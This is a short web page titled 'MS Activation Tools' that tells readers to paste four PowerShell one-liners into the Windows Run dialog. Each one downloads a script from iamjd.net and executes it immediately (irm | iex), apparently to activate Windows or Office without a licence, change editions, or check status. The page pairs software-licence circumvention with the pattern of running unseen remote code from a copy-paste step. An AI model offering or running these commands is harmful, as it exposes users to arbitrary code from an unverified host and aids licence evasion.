ACTIVATION

MS Activation Tools

Click a button to copy its command, then paste it into the Windows Run dialog (Win + R) and press Enter.

Windows Activation

powershell -c "irm https://iamjd.net/get/msa | iex"

Office Activation

powershell -c "irm https://iamjd.net/get/osa | iex"

Change Windows Edition

powershell -c "irm https://iamjd.net/get/cwe | iex"

Check Activation Status

powershell -c "irm https://iamjd.net/get/cas | iex"

These tools are not official Microsoft products and are intended for testing purposes only.